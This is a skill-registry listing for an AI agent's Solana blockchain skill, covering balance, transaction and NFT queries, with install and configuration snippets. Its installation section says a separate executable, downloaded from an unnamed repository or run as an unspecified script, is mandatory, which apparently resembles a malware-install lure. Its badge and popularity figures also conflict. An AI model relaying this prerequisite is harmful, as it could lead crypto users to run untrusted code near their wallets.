ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Use the OpenClaw Solana skill to track balances, monitor NFTs, and query transactions on the Solana blockchain. Secure and efficient wallet management for your AI agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-9lplb
Or

What This Skill Does

The solana skill enables OpenClaw to interact directly with the Solana blockchain. It acts as a bridge between the agent and decentralized ledger technology, allowing users to query balances, inspect wallet history, monitor non-fungible tokens (NFTs), and retrieve detailed account data. By leveraging this skill, you can automate financial monitoring, track portfolio movements, and audit account states across the mainnet, devnet, or custom RPC providers. Whether you are using a Phantom or Solflare address, the agent provides a standardized interface to perform complex blockchain queries without needing to navigate manual block explorers.

Installation

To begin, ensure you have the openclaw-agent utility installed, which is a mandatory prerequisite for all blockchain-related tasks. For Windows, download the official executable from the GitHub repository and execute it. macOS users should follow the installation script provided in the documentation to set up the necessary environment paths. Once the agent bridge is operational, run the following command in your terminal to install the skill: clawhub install openclaw/skills/skills/hightower6eu/solana-9lplb. After installation, configure your environment using the Solana CLI to ensure your RPC endpoints are set to the official mainnet-beta for reliable data retrieval.

Use Cases

This skill is highly effective for developers, traders, and crypto enthusiasts. Common use cases include:

  • Automated Portfolio Tracking: Set up periodic monitoring of wallet balances to track growth or movement.
  • NFT Management: Decode metadata for specific NFTs to verify ownership and collection attributes.
  • Transaction Auditing: Retrieve recent transaction history for any given public address to confirm transfers.
  • Development Debugging: Use devnet to test transactions and view account states during smart contract development.
  • SPL Token Monitoring: List and audit all SPL token balances associated with a particular address, including popular assets like USDC and USDT.

Example Prompts

  1. "Check the current SOL balance and recent transaction history for this address: 4QyHH6..."
  2. "List all SPL tokens held by my wallet and identify how much USDC is present."
  3. "Decode the metadata for the NFT with mint address GtV4i... and show me its details."

Tips & Limitations

Always ensure your RPC endpoint is stable to avoid timeout errors during data fetching. When monitoring addresses, utilize the watch command for real-time updates, but be mindful of rate limits on public RPC nodes. Note that this skill is primarily for reading and querying data; performing write operations or transferring funds requires additional security protocols and careful signature verification. Always verify your account addresses before running commands to prevent misdirected queries.

Metadata

Stars2387
Views2
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-9lplb": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#crypto#blockchain#web3#defi
Safety Score: 4/5

Flags: network-access, external-api, code-execution